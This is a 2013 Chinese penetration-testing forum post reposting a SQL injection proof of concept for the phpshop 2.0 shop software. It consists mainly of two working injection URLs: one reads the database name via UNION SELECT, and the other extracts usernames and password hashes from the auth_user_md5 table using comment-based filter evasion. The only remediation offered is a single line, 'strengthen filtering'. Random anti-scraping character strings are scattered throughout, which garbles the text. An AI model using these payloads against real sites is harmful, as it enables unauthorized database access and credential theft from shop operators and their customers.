中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
$ D( b3 x `2 {6 \6 ^! ^
0 ]1 s: R8 U; k; V R
作者 : By onestree
# m* J0 f" O2 m! @" g
下载地址 :
http://code.google.com/p/phpshop/downloads/list
7 y: `8 a$ y, s% U8 D8 q
测试地址: windows 7 / ubuntu
- y& c& I$ U7 o% H/ ~) `% o
! V3 F- a8 G" g r
) f# @2 T, _/ P& F1 h2 L
SQLi p0c:
* m) N% O3 \/ S& }
2 N' E5 o, n. s8 Y2 m
==================
0 Y( U# V* S: K. n- T. ^
5 R7 @0 k0 y6 N* T* l
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
+ G3 V% f# O8 m# H
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
/ t* S2 K; U% B5 t
" d; N8 w* W. l; [4 S( C! A
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
) N# v6 |7 a; Y# D' l
: z' X* L' j7 Y7 f: }8 U. r
修复:
( Q& c6 B z7 |( n; a: |+ M
加强过滤
1 m4 v6 D! Q; U5 G/ V- W
4 {# Q- L( o; c) ]
, Q- M1 N3 O; c% B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2